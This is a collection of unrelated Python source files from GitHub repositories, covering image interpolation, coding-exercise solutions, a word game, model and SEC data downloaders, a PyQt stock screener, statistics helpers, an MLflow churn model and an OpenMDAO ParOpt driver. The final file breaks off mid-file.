px_per_km).astype(int)\n\n\tthreshold = 1 / 2 * px_per_km**2\n\tpair_counter = Counter([tuple(pair) for pair in grid])\n\tinterpolated_grid = sorted([key for key, value in pair_counter.items() if value >= threshold])\n\tinterpolated_grid = np.array(interpolated_grid)\n\tnew_width = max(interpolated_grid[:,0]) + 1\n\tnew_height = max(interpolated_grid[:,1]) + 1\n\n\tsmall_img = np.ones((new_height, new_width, 3), np.uint8)*255\n\timg = np.ones((new_height*px_per_km, new_width*px_per_km, 3), np.uint8)*255\n\n\tfor x, y in interpolated_grid:\n\t\tcolor1 = (0, 170, 255)\n\t\tcolor2 = (0, 0, 255)\n\t\ttmpx = x * px_per_km\n\t\ttmpy = y * px_per_km\n\t\tif((x + y) % 2 == 0):\n\t\t\tsmall_img[y, x] = color1\n\t\t\timg[tmpy:tmpy+px_per_km, tmpx:tmpx+px_per_km] = color1\n\t\telse:\n\t\t\tsmall_img[y, x] = color2\n\t\t\timg[tmpy:tmpy+px_per_km, tmpx:tmpx+px_per_km] = color2\n\n\tsmall_img_dest_path = img_path.rsplit(\"/\", 1)[0] + \"/interpolated_small_img.png\"\n\timg_dest_path = img_path.rsplit(\"/\", 1)[0] + 
\"/interpolated_img.png\"\n\tcv2.imwrite(small_img_dest_path, small_img)\n\tcv2.imwrite(img_dest_path, img)\n\t\n\tif((hosp_coord != None) and (max_dist != None)):\n\t\tcolor1 = (255, 0, 0)\n\t\tcolor2 = (255, 170, 170)\n\t\ti = 0\n\t\tfor x, y, c in hosp_coord:\n\t\t\th = new_height * px_per_km\n\t\t\tw = new_width * px_per_km\n\t\t\ttmpx = int(x * px_per_km)\n\t\t\ttmpy = int(y * px_per_km)\n\t\t\timg[h-tmpy:h-tmpy+px_per_km, tmpx:tmpx+px_per_km] = color1\n\t\t\tcircle = midPointCircleDraw((tmpx, h-tmpy), max_dist*px_per_km)\n\t\t\thrange, wrange = range(h), range(w)\n\t\t\tfor xc, yc in circle:\n\t\t\t\tif(xc in wrange and yc in hrange):\n\t\t\t\t\timg[int(yc), int(xc)] = color2\n\t\t\t\t\n\t\timg_dest_path = img_path.rsplit(\"/\", 1)[0] + \"/interpolated_hosp_img.png\"\n\t\tcv2.imwrite(img_dest_path, img)\n\n\n\tinterpolated_grid[:,1] = abs(interpolated_grid[:,1] - new_height)\n\treturn interpolated_grid\n\n\ndef gaussPopulation(grid, population, mean, cov):\n\tgrid_dict = {}\n\n\t# put at least one person in every square in the grid if the population is greater than the grid size\n\tinit_value = 1 if population > grid.shape[0] else 0\n\t# adjust the number of point to generate based on how many are already present\n\tnpoints = population - grid.shape[0] if init_value == 1 else population\n\t\n\tfor x, y in grid:\n\t\tgrid_dict[(x, y)] = init_value\n\n\tprint(\"Generating the random population:\")\n\tfr = np.floor(population / 10)\n\tfor i in range(npoints):\n\t\tpoint = intGaussPoint2D(mean, cov, grid_dict)\n\t\tgrid_dict[point] += 1\n\t\tif i % fr == 0:\n\t\t\tpercent = int(np.round(i * 100 / npoints))\n\t\t\tprint(\"Generated \" + str(i) + \" points: \" + str(percent) + \"%\")\n\t\n\treturn grid_dict\n\n\ndef gaussPopulationCSV(grid, population, csv_path, cov, px_per_km):\n\twith open(csv_path, mode='r') as csv_file:\n\t\t# initialise the means and the probability distribution form the CSV\n\t\tcsv_reader = csv.reader(csv_file)\n\t\t\n\t\tcsv_pop = []\n\t\tcsv_means = []\n\t\tfor line in csv_reader:\n\t\t\tif(isNumber(line[0])):\n\t\t\t\tcsv_pop.append(int(line[2]))\n\t\t\t\ttmp = re.split('[(), ]', line[3])\n\t\t\t\tmean = tuple([float(x) for x in tmp if isNumber(x)])\n\t\t\t\tcsv_means.append(mean)\n\n\t\t#csv_pop = np.sqrt(csv_pop)\n\t\tcsv_pop = np.array(csv_pop) / np.sum(csv_pop)\n\t\tcsv_means = np.floor(np.array(csv_means) / px_per_km).astype(int)\n\n\t\t# initialise the grid dictionary\n\t\tgrid_dict = {}\n\n\t\t# put at least one person in every square in the grid if the population is greater than the grid size\n\t\tinit_value = 1 if population > grid.shape[0] else 0\n\t\t# adjust the number of point to generate based on how many are already present\n\t\tnpoints = population - grid.shape[0] if init_value == 1 else population\n\t\t\n\t\tfor x, y in grid:\n\t\t\tgrid_dict[(x, y)] = init_value\n\n\t\trng = np.random.default_rng()\n\t\trand_means = rng.choice(csv_means, npoints, p=csv_pop)\n\n\t\tprint(\"Generating the random population:\")\n\t\tfr = np.floor(population / 10)\n\t\ti = population - npoints\n\t\tfor mean in rand_means:\n\t\t\tpoint = intGaussPoint2D(mean, cov, grid_dict)\n\t\t\tgrid_dict[point] += 1\n\t\t\tif i % fr == 0:\n\t\t\t\tpercent = int(np.round(i * 100 / population))\n\t\t\t\tprint(\"Generated \" + str(i) + \" points: \" + str(percent) + \"%\")\n\t\t\ti += 1\n\n\t\treturn grid_dict\n\ndef plotPopulation(grid_dict, img_path=None):\n\tfig = plt.figure()\n\tax = Axes3D(fig)\n\n\tsequence_containing_x_vals = []\n\tsequence_containing_y_vals = []\n\n\tfor x, 
y in grid_dict:\n\t\tsequence_containing_x_vals.append(x)\n\t\tsequence_containing_y_vals.append(y)\n\n\tsequence_containing_z_vals = list(grid_dict.values())\n\n\tax.scatter(sequence_containing_x_vals, sequence_containing_y_vals, sequence_containing_z_vals)\n\tplt.gca().set_aspect('equal', adjustable='box')\n\t\n\tdest_folder = img_path.rsplit(\"/\", 1)[0] + \"/\" if img_path != None else \"\"\n\t\n\tax.view_init(20, 290)\n\tfig.suptitle('Population distribution\\nelev=20, azimut=290')\n\tplt.savefig(dest_folder + \"pop_distribution_20_290.pdf\", format='pdf', bbox_inches='tight')\n\t\n\tax.view_init(90, 270)\n\tfig.suptitle('Population distribution\\nelev=90, azimut=270')\n\tplt.savefig(dest_folder + \"pop_distribution_90_270.pdf\", format='pdf', bbox_inches='tight')\n\t\n\tfor i in range(0, 360, 90):\n\t\ttitle = \"Population distribution\\nelev=0, azimut=\" + str(i)\n\t\tfile_path = dest_folder + \"pop_distribution_0_\" + str(i) + \".pdf\"\n\t\tax.view_init(0, i)\n\t\tfig.suptitle(title)\n\t\tplt.savefig(file_path, format='pdf', bbox_inches='tight')\n\n\ndef imgExtractRequest(img_path, px_per_km, population, mean=None, csv_file=None, hosp_coord=None, max_dist=None, plot=False):\n\tprint(\"Generating the interpolated images...\")\n\tgrid = interpolateImg(img_path, px_per_km, hosp_coord, max_dist)\n\t\n\tprint(\"Interpolated images generated.\")\n\n\ttxt = input(\"Do you want to generate the gaussian distributed population? [y/n]\\n\")\n\n\tdone = False\n\twhile(not(done)):\n\t\tif(txt == \"n\"):\n\t\t\treturn None\n\t\telif(txt == \"y\"):\n\t\t\tdone = True\n\t\telse:\n\t\t\ttxt = input(\"Do you want to generate the gaussian distributed population? [y/n]\\n\")\n\n\t# define the covariance matrix rows\n\tcov_row1 = np.array([max(grid[:,0]), 0])\n\tcov_row2 = np.array([0, max(grid[:,1])])\n\tcov = np.matrix([cov_row1, cov_row2])\n\n\tif(csv_file == None):\n\t\t# normalize the mean on px_per_km\n\t\tmean = np.floor(np.array(mean) / px_per_km).astype(int)\n\t\tmean = tuple(mean)\n\n\t\tcov *= 5\n\n\t\tgrid_dict = gaussPopulation(grid, population, mean, cov)\n\telse:\n\t\tgrid_dict = gaussPopulationCSV(grid, population, csv_file, cov, px_per_km)\n\n\t'''\n\ts = 0\n\tfor i in range(33, 45):\n\t\tfor j in range(27, 40):\n\t\t\ts += grid_dict[(i, j)]\n\n\tprint(s)\n\t'''\n\n\tif plot:\n\t\tplotPopulation(grid_dict, img_path)\n\n\treturn grid_dict\n\n\nif __name__ == '__main__':\n\timg_path = sys.argv[1]\n\tmu = (39, 33)\n\tpx_per_km = 11\n\tpopulation = int(sys.argv[2])\n\timgExtractRequest(img_path, px_per_km, population, mean=mu)","repo_name":"AndreaB2604/MasterThesis","sub_path":"instances_generator/img_extract_request.py","file_name":"img_extract_request.py","file_ext":"py","file_size_in_byte":7732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
{"seq_id":"15500192155","text":"NQ = list(map(int,input().split()))\nlis1= []\nlis = []\nd = 0\nfor a in range(NQ[0]):\n    c = tuple(map(int,input().split())) #store each range in the list as a tuple\n    lis.append(c)\n    \n\nfor a in range(NQ[1]):\n    b = int(input())\n    f=0\n    l=NQ[0]-1\n    \n    check = False  \n    while f < l: #binary search for the interval whose bounds are closest to the given number\n        mid = (f + l + 1) // 2\n        if b < lis[mid][0]:\n            l = mid -1\n        elif b > lis[mid][1]:\n            f = mid +1\n        if b >= lis[mid][0] and b <= lis[mid][1]: #when the number lies inside the bounds of the tuple at mid, print Yes\n            print(\"Yes\")\n            check = True\n            break\n    
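# (added note) if the loop ended without a hit, f has settled on the single candidate interval,\n    # so one explicit bounds check below decides the answer\n    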
if not check:\n        if f <= l and f >= 0 and b >= lis[f][0] and b <= lis[f][1]:\n            print(\"Yes\")\n        else:\n            print(\"No\")\n\t\t\t\n#https://www.hackerrank.com/contests/inzva-02-algorithm-1-onsite-2018/challenges/find-the-range/problem\n","repo_name":"tarikisildar/competitive","sub_path":"find_the_range.py","file_name":"find_the_range.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"tr","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"}
{"seq_id":"69962294809","text":"# Problem Set 5: Ghost\n# Name: \n# Collaborators: \n# Time: \n#\n\nimport random\n\n# -----------------------------------\n# Helper code\n# (you don't need to understand this helper code)\nimport string\n\nWORDLIST_FILENAME = \"words.txt\"\n\ndef load_words():\n    \"\"\"\n    Returns a list of valid words. Words are strings of lowercase letters.\n    \n    Depending on the size of the word list, this function may\n    take a while to finish.\n    \"\"\"\n    print('Loading word list from file...')\n    # inFile: file\n    inFile = open(WORDLIST_FILENAME, 'r', encoding='ascii')\n    # wordlist: list of strings\n    wordlist = []\n    for line in inFile:\n        wordlist.append(line.strip().lower())\n    print(\"  \", len(wordlist), \"words loaded.\")\n    return wordlist\n\ndef get_frequency_dict(sequence):\n    \"\"\"\n    Returns a dictionary where the keys are elements of the sequence\n    and the values are integer counts, for the number of times that\n    an element is repeated in the sequence.\n\n    sequence: string or list\n    return: dictionary\n    \"\"\"\n    # freqs: dictionary (element_type -> int)\n    freq = {}\n    for x in sequence:\n        freq[x] = freq.get(x,0) + 1\n    return freq\n\n\n# (end of helper code)\n# -----------------------------------\n\n# Actually load the dictionary of words and point to it with \n# the wordlist variable so that it can be accessed from anywhere\n# in the program.\nwordlist = load_words()\n\n# TO DO: your code begins here!\ndef word_ends_game(word, word_list):\n    if len(word) < 4:\n        return False\n    else:\n        if word.lower() in word_list:\n            return True\n        else:\n            return False\n\ndef word_can_be_formed(word, word_list):\n    for entry in word_list:\n        if word.lower() == entry[0:len(word)]:\n            return True\n    return False\n\n\n\ndef play_game(word_list):\n\n    print()\n    print()\n\n    turn = 1\n\n    word = ''\n\n    while (True):\n        if turn%2==1:\n            letter = input(\"Player 1: \")\n        \n        else:\n            letter = input(\"Player 2: \")\n\n        if letter not in string.ascii_letters:\n            print(\"That's not a letter. Please Try again.\")\n            continue\n\n\n        turn = turn + 1\n        word = word+letter\n\n        if word_can_be_formed(word, word_list)==False:\n            print('GAME OVER! ' +str(word.upper())+' does not start a word')\n            word = ''\n            return 0\n\n        print()\n        print(word.upper())\n\n
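        # (added note) a round only ends here once the fragment is itself a dictionary word of length >= 4\n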
        if(word_ends_game(word, word_list)):\n            print('GAME OVER! ' +str(word.upper())+' is a word.')\n            word = ''\n            return 0\n\n\ndef play_ghost(word_list):\n    print()\n    print('GHOST')\n    while True:\n        cmd = input('n: new game\\ne: end game\\n')\n        if cmd == 'n' or cmd == 'N':\n            play_game(word_list)\n            print()\n        elif cmd == 'e' or cmd == 'E':\n            break\n        else:\n            print(\"Invalid command.\")\n\n\nplay_ghost(wordlist)\n","repo_name":"daytonpe/mit-6.00","sub_path":"ps05/ps5_ghost.py","file_name":"ps5_ghost.py","file_ext":"py","file_size_in_byte":2920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
{"seq_id":"8405631974","text":"from transformers import AutoModelForCausalLM, AutoTokenizer\r\nimport json\r\nimport os\r\n\r\n# Define base path and model directory\r\nbase_path = os.getcwd()\r\nmodel_dir = os.path.join(base_path, \"models\")\r\n\r\n# Ensure the model directory exists\r\nos.makedirs(model_dir, exist_ok=True)\r\n\r\ndef download_model(model_name):\r\n    \"\"\"\r\n    Download a model and its tokenizer from Hugging Face if they are not already downloaded.\r\n    Args:\r\n        model_name (str): The name of the model on Hugging Face.\r\n    \"\"\"\r\n    # Format the model name: replace '--' and '/' with '_'\r\n    formatted_model_name = model_name.replace('--', '_').replace('/', '_')\r\n    target_dir = os.path.join(model_dir, f\"{formatted_model_name}\")\r\n\r\n    # Check if the model already exists\r\n    if os.path.exists(target_dir):\r\n        print(f\"Model '{model_name}' already downloaded.\")\r\n        return\r\n\r\n    print(f\"Downloading: {model_name}\")\r\n\r\n    # Download the model\r\n    model = AutoModelForCausalLM.from_pretrained(\r\n        model_name,\r\n        device_map=\"auto\",\r\n        trust_remote_code=False,\r\n        revision=\"main\",\r\n        cache_dir=model_dir\r\n    )\r\n    tokenizer = AutoTokenizer.from_pretrained(\r\n        model_name,\r\n        use_fast=True,\r\n        cache_dir=model_dir,\r\n        model_max_length=4096,\r\n        truncation_side='left'\r\n    )\r\n\r\n    # Save the model and tokenizer to a directory\r\n    model.save_pretrained(target_dir)\r\n    tokenizer.save_pretrained(target_dir)\r\n\r\n    print(f\"Model and tokenizer for '{model_name}' downloaded and saved in '{target_dir}'.\")\r\n\r\nif __name__ == \"__main__\":\r\n    # Read model name from settings.json\r\n    with open('settings.json') as settings_file:\r\n        settings = json.load(settings_file)\r\n        model_name_or_path = settings['model_name_or_path']\r\n\r\n    # Check if the model directory already exists\r\n    model_path = os.path.join(model_dir, model_name_or_path.replace('--', '_').replace('/', '_'))\r\n    if not os.path.exists(model_path):\r\n        # Download the specified model if it doesn't exist\r\n        download_model(model_name_or_path)\r\n    else:\r\n        print(f\"Model {model_name_or_path} already exists.\")\r\n\r\n","repo_name":"libraryofcelsus/AetherNode","sub_path":"Download_Model.py","file_name":"Download_Model.py","file_ext":"py","file_size_in_byte":2307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
{"seq_id":"4336627685","text":"# Program by Joe Doro\r\n# Chapter 2, EX 9, PG 78\r\n\r\ndef main():\r\n    \r\n    tempC = int(input('Enter a temperature in Celsius: '))\r\n\r\n    tempF = tempC * 1.8 + 32\r\n\r\n    print('The temperature you entered is equal to:', tempF, 
'F')\r\n\r\nmain()\r\n","repo_name":"JoeSDoro/Python_Class","sub_path":"chp2ex9.py","file_name":"chp2ex9.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"39257376470","text":"import sys\nimport os\nimport requests\nimport time\n\nfrom PyQt5.QtCore import QObject, QThread, pyqtSignal\nfrom PyQt5.QtWidgets import QApplication, QDialog, QMainWindow, QMessageBox\nfrom PyQt5.uic import loadUi\n\nfrom screener import Ui_MainWindow\n\nclass Worker(QObject):\n finished = pyqtSignal()\n progress = pyqtSignal(int)\n total_size = pyqtSignal(int)\n\n def download_historical_data(self):\n url = \"http://www.sec.gov/Archives/edgar/daily-index/xbrl/companyfacts.zip\"\n self.download(url, \"historical/companyfacts.zip\", 1200000000)\n\n def download_stock_prices(self):\n url = \"https://www.sec.gov/files/company_tickers.json\"\n self.download(url, \"json/company_tickers.json\", 900000)\n\n def download(self, url, filename, total_size):\n\n headers = {'User-agent': \"jmq@hotmail.com\"}\n response = requests.get(url, headers=headers, stream=True)\n print(\"total size is \" + str(total_size))\n self.total_size.emit(total_size)\n\n block_size = 32 * 1024\n \n current_size = 0\n \n with open(filename, \"wb\") as tickers:\n for data in response.iter_content(block_size):\n current_size += len(data)\n self.progress.emit(current_size)\n tickers.write(data)\n \n print(\"current size is \" + str(current_size))\n\n self.progress.emit(total_size)\n self.finished.emit()\n \n\nclass Window(QMainWindow, Ui_MainWindow):\n def __init__(self, parent=None):\n super().__init__(parent)\n self.setupUi(self)\n self.create_directories()\n\n self.setup_actions()\n #self.connectSignalsSlots()\n #self.actionAbout.triggered.connect(self.about)\n\n \"\"\"\n def connectSignalsSlots(self):\n self.action_Exit.triggered.connect(self.close)\n self.action_Find_Replace.triggered.connect(self.findAndReplace)\n self.action_About.triggered.connect(self.about)\n\n def findAndReplace(self):\n dialog = FindReplaceDialog(self)\n dialog.exec()\n\n \"\"\"\n def about(self):\n QMessageBox.about(\n self,\n \"About Sample Editor\",\n \"
<p>A sample text editor app built with:</p>\"\n            \"<p>- PyQt</p>\"\n            \"<p>- Qt Designer</p>\"\n            \"<p>- Python</p>
\",\n )\n\n def create_directories(self):\n dirs = [\"json\", \"historical\"]\n for dir in dirs:\n if not os.path.exists(dir):\n os.makedirs(dir)\n\n def jmqdownload_company_tickers(self):\n pass\n\n def setup_actions(self):\n self.actionAbout.triggered.connect(self.software_info)\n self.actionDownload_Historical_Data.triggered.connect(self.download_historical)\n self.actionDownload_Stock_Prices.triggered.connect(self.download_prices)\n\n def software_info(self):\n QMessageBox.about(self, \"StockScreener\", \"v0.1\")\n\n def download_prices(self):\n self.progressBar.setValue(0)\n\n self.thread = QThread()\n self.worker = Worker()\n self.worker.moveToThread(self.thread)\n \n self.thread.started.connect(self.worker.download_stock_prices)\n self.worker.finished.connect(self.thread.quit)\n self.worker.finished.connect(self.worker.deleteLater)\n self.thread.finished.connect(self.thread.deleteLater)\n self.worker.progress.connect(self.update_progress_bar)\n self.worker.total_size.connect(self.update_progress_bar_range)\n\n self.thread.start()\n \n def download_historical(self, func):\n self.progressBar.setValue(0)\n\n self.thread = QThread()\n self.worker = Worker()\n self.worker.moveToThread(self.thread)\n \n self.thread.started.connect(self.worker.download_historical_data)\n self.worker.finished.connect(self.thread.quit)\n self.worker.finished.connect(self.worker.deleteLater)\n self.thread.finished.connect(self.thread.deleteLater)\n self.worker.progress.connect(self.update_progress_bar)\n self.worker.total_size.connect(self.update_progress_bar_range)\n\n self.thread.start()\n \n def update_progress_bar(self, value):\n self.progressBar.setValue(value)\n\n def update_progress_bar_range(self, range):\n self.progressBar.setRange(0, range)\n\n \nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n win = Window()\n win.show()\n sys.exit(app.exec())\n","repo_name":"jmqjmq/QtStockScreener","sub_path":"py/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":4427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"15168004054","text":"import scipy.stats as sp\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\ndef get_pearsonr(dataframe, names_of_variables):\n num = 0\n for variable1 in names_of_variables:\n num += 1\n for variable2 in names_of_variables[num:]:\n if variable1 != variable2:\n correlation = sp.pearsonr(dataframe[variable1], dataframe[variable2])\n print(\"The significance (p) of correlation \" + \"(\" + str(correlation[0]) + \")\" + \" between \" + variable1 + \" and \" + variable2 + \": \" + str(correlation[1]))\n\n\ndef plot_correlations(dataframe, names_of_variables):\n '''\n '''\n df = sns.dataframe[names_of_variables]\n sns.pairplot(df, kind=\"scatter\", hue=\"species\", markers=[\"o\", \"s\", \"D\"], palette=\"Set2\")\n plt.show()\n\n\ndef mean_std_of_variables(dataframe, names_of_variable):\n '''\n '''\n return dataframe[names_of_variable].describe()['mean':'std']\n","repo_name":"kimyoungwon/python01_2019_project","sub_path":"Correlations_Mean_SD.py","file_name":"Correlations_Mean_SD.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40419203527","text":"import numpy as np\nimport random\n\n\ndef synthesize(acc_distribution, n_papers, papers_page, J, theta):\n '''\n \n :param acc_distribution: \n :param n_papers: \n :param papers_page: \n :param J: \n :param theta: \n :return:GT- ground truth 
GT = [np.random.binomial(1, theta) for _ in range(n_papers)]\n\n    # generate observations\n    pages_n = n_papers // papers_page\n    psi_obj = [[] for obj in range(n_papers)]\n    psi_w = [{} for _ in range(pages_n*J)]\n    for page_id in range(pages_n):\n        for _pointer in range(J):\n            worker_id = page_id * J + _pointer\n            worker_acc = random.choice(acc_distribution)\n            for obj_id in range(page_id*papers_page, page_id*papers_page+papers_page, 1):\n                gold_value = GT[obj_id]\n                if gold_value:\n                    worker_judgment = np.random.binomial(1, worker_acc)\n                else:\n                    worker_judgment = np.random.binomial(1, 1-worker_acc)\n                psi_obj[obj_id].append(worker_judgment)\n                psi_w[worker_id].update({obj_id: worker_judgment})\n    return GT, psi_obj, psi_w\n","repo_name":"Evgeneus/scope-based-classification-algorithm","sub_path":"generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
{"seq_id":"5668341693","text":"\"\"\" Model for predicting user churn. \"\"\"\nimport os\nimport mlflow\nimport pickle\nimport pandas as pd\n\nfrom config import settings\n\nMODEL_REGISTRY_PATH = f\"models:/{settings.model_name}/{settings.stage}\"\nMLFLOW_URI = f\"http://{settings.mlflow_host}:5000\"\nos.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"] = \"secret.json\"\n\n\nmlflow.set_tracking_uri(MLFLOW_URI)\n\nwith open(\"app/models/min_max_scaler.bin\", \"rb\") as f:\n    scaler = pickle.load(f)\n\nwith open(\"app/models/ohe.bin\", \"rb\") as f:\n    ohe = pickle.load(f)\n\n\ndef prepare_features(users: list) -> pd.DataFrame:\n    \"\"\"\n    Prepare features for model.\n\n    Args:\n        users (list): List of dictionaries with user data.\n\n    Returns:\n        pd.DataFrame: DataFrame with prepared features.\n\n    \"\"\"\n    num_features = [\"tenure\", \"MonthlyCharges\", \"TotalCharges\"]\n    cat_features = [\n        \"gender\",\n        \"SeniorCitizen\",\n        \"Partner\",\n        \"Dependents\",\n        \"PhoneService\",\n        \"MultipleLines\",\n        \"InternetService\",\n        \"OnlineSecurity\",\n        \"OnlineBackup\",\n        \"DeviceProtection\",\n        \"TechSupport\",\n        \"StreamingTV\",\n        \"StreamingMovies\",\n        \"Contract\",\n        \"PaperlessBilling\",\n        \"PaymentMethod\",\n    ]\n    df = pd.DataFrame(users)\n    df.TotalCharges = pd.to_numeric(df.TotalCharges, errors=\"coerce\")\n    df = df.iloc[:, 1:]\n    X = ohe.transform(df[cat_features])\n    X = pd.DataFrame(X, columns=ohe.get_feature_names_out())\n    X = pd.concat([X, df[num_features]], axis=1)\n    features = X.columns.values\n    X = pd.DataFrame(scaler.transform(X))\n    X.columns = features\n    return X\n\n\nmodel = mlflow.pyfunc.load_model(MODEL_REGISTRY_PATH)\n","repo_name":"kkruglik/mlops-zoomcamp-project","sub_path":"app/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
{"seq_id":"41015372175","text":"# reads the requested files and asserts that there aren't any duplicate matchboxes\nfrom Board import Board\nmenacesFile = \"../Menaces.txt\"\nwith open(menacesFile, \"r\") as infile:\n    fnames = infile.readlines()\nfor fname in fnames:\n    fname = fname.strip()\n    try:\n        with open(fname, \"r\") as infile:\n            lines = infile.readlines()\n        for i in range(len(lines)):\n            print(i)\n            board1 = lines[i].split(\";\")[0]\n            actualBoard1 = Board(int(len(board1) ** 0.5))\n            
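# (added note) Board keeps its cells in the flat list _grid, so it can be filled straight from the string\n            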
actualBoard1._grid = [board1[i] for i in range(len(board1))]\n for j in range(i + 1, len(lines)):\n board2 = lines[j].split(\";\")[0]\n actualBoard2 = Board(int(len(board2) ** 0.5))\n actualBoard2._grid = [board2[i] for i in range(len(board2))]\n try:\n assert board1 != board2\n except AssertionError:\n print(f\"line {i} of {fname}: {board1}\")\n print(f\"line {j} of {fname}: {board2}\")\n try:\n assert not actualBoard1.isEquivalentTo(actualBoard2)\n except AssertionError:\n print(f\"line {i} of {fname}: {board1}\")\n print(f\"line {j} of {fname}: {board2}\")\n print(f\"Finished checking {fname}\")\n except FileNotFoundError:\n pass\n","repo_name":"GabeByk/MENACE","sub_path":"duplicateChecker.py","file_name":"duplicateChecker.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"38506901439","text":"\"\"\"\nOpenMDAO Wrapper for ParOpt\n\"\"\"\n\nimport numpy as np\nimport mpi4py.MPI as MPI\n\nfrom paropt import ParOpt\nimport openmdao\nfrom openmdao.core.driver import Driver\n\n\nclass ParOptDriver(Driver):\n \"\"\"\n Driver wrapper for ParOpt\n\n Attributes\n ----------\n fail : bool\n Flag that indicates failure of most recent optimization.\n iter_count : int\n Counter for function evaluations.\n result : OptimizeResult\n Result returned from optimize call.\n opt_settings : dict\n Dictionary of solver-specific options. See the ParOpt documentation.\n \"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"\n Initialize the ParOptDriver\n\n Parameters\n ----------\n **kwargs : dict of keyword arguments\n Keyword arguments that will be mapped into the Driver options.\n \"\"\"\n super().__init__(**kwargs)\n\n # What we support\n self.supports[\"optimization\"] = True\n\n self.result = None\n self._dvlist = None\n self.fail = False\n self.iter_count = 0\n self.paropt_use_qn_correction = False\n\n return\n\n def _declare_options(self):\n \"\"\"\n Declare options before kwargs are processed in the init method.\n \"\"\"\n\n info = ParOpt.getOptionsInfo()\n\n for name in info:\n default = info[name].default\n descript = info[name].descript\n values = info[name].values\n if info[name].option_type == \"bool\":\n self.options.declare(name, default, types=bool, desc=descript)\n elif info[name].option_type == \"int\":\n self.options.declare(\n name,\n default,\n types=int,\n lower=values[0],\n upper=values[1],\n desc=descript,\n )\n elif info[name].option_type == \"float\":\n self.options.declare(\n name,\n default,\n types=float,\n lower=values[0],\n upper=values[1],\n desc=descript,\n )\n elif info[name].option_type == \"str\":\n if default is None:\n self.options.declare(\n name, default, types=str, allow_none=True, desc=descript\n )\n else:\n self.options.declare(name, default, types=str, desc=descript)\n elif info[name].option_type == \"enum\":\n self.options.declare(name, default, values=values, desc=descript)\n\n return\n\n def _setup_driver(self, problem):\n \"\"\"\n Prepare the driver for execution.\n\n This is the final thing to run during setup.\n\n Parameters\n ----------\n paropt_problem : \n Pointer\n \"\"\"\n\n super()._setup_driver(problem)\n\n # Raise error if multiple objectives are provided\n if len(self._objs) > 1:\n msg = \"ParOpt currently does not support multiple objectives.\"\n raise RuntimeError(msg.format(self.__class__.__name__))\n\n # Create the ParOptProblem from the OpenMDAO problem\n self.paropt_problem = ParOptProblem(problem)\n\n # We may bind the external method for 
quasi-newton update correction\n # if specified\n if self.paropt_use_qn_correction:\n self.paropt_problem.computeQuasiNewtonUpdateCorrection = (\n self.computeQuasiNewtonUpdateCorrection.__get__(self.paropt_problem)\n )\n\n # Take only the options declared from ParOpt\n info = ParOpt.getOptionsInfo()\n paropt_options = {}\n for key in self.options:\n if key in info.keys():\n paropt_options[key] = self.options[key]\n\n self.opt = ParOpt.Optimizer(self.paropt_problem, paropt_options)\n\n return\n\n def run(self):\n \"\"\"\n Optimize the problem using the ParOpt optimizer.\n\n Returns\n -------\n boolean\n Failure flag; True if failed to converge, False is successful.\n \"\"\"\n # Note: failure flag is always False\n self.opt.optimize()\n\n return False\n\n def use_qn_correction(self, method):\n \"\"\"\n Bind an external function which handles the quasi-newton update\n correction to the paropt problem instance\n \"\"\"\n\n self.paropt_use_qn_correction = True\n self.computeQuasiNewtonUpdateCorrection = method\n return\n\n\nclass ParOptProblem(ParOpt.Problem):\n def __init__(self, problem):\n \"\"\"\n ParOptProblem class to pass to the ParOptDriver. Takes\n in an instance of the OpenMDAO problem class and creates\n a ParOpt problem to be passed into ParOpt through the\n ParOptDriver.\n \"\"\"\n\n self.problem = problem\n\n self.comm = self.problem.comm\n self.nvars = None\n self.ncon = None\n self.nineq = None\n\n # Discard constraints with upper bound larger than this\n self.constr_upper_limit = 1e20\n\n # Discard constraints with lower bound smaller than this\n self.constr_lower_limit = -1e20\n\n # Get the design variable, objective and constraint objects from OpenMDAO\n self.om_dvs = self.problem.model.get_design_vars()\n self.om_con = self.problem.model.get_constraints()\n self.om_obj = self.problem.model.get_objectives()\n\n # Get the number of design vars from the openmdao problem\n self.nvars = 0\n for name, meta in self.om_dvs.items():\n size = meta[\"size\"]\n self.nvars += size\n\n # Get the number of constraints from the openmdao problem\n self.ncon = 0\n self.nineq = 0\n for name, meta in self.om_con.items():\n # If current constraint is equality constraint\n if meta[\"equals\"] is not None:\n self.ncon += meta[\"size\"]\n # Else, current constraint is inequality constraint\n else:\n if meta[\"lower\"] > self.constr_lower_limit:\n self.ncon += meta[\"size\"]\n self.nineq += meta[\"size\"]\n if meta[\"upper\"] < self.constr_upper_limit:\n self.ncon += meta[\"size\"]\n self.nineq += meta[\"size\"]\n\n # Initialize the base class\n super(ParOptProblem, self).__init__(\n self.comm,\n nvars=self.nvars,\n num_dense_constraints=self.ncon,\n num_dense_inequalities=self.nineq,\n )\n\n return\n\n def getVarsAndBounds(self, x, lb, ub):\n \"\"\"Set the values of the bounds\"\"\"\n\n # Get design vars from openmdao as a dictionary\n desvar_vals = self.problem.driver.get_design_var_values()\n\n i = 0\n for name, meta in self.om_dvs.items():\n size = meta[\"size\"]\n x[i : i + size] = desvar_vals[name]\n lb[i : i + size] = meta[\"lower\"]\n ub[i : i + size] = meta[\"upper\"]\n i += size\n\n # Check if number of design variables consistent\n if i != self.nvars:\n raise ValueError(\n \"Number of design variables get (%d) 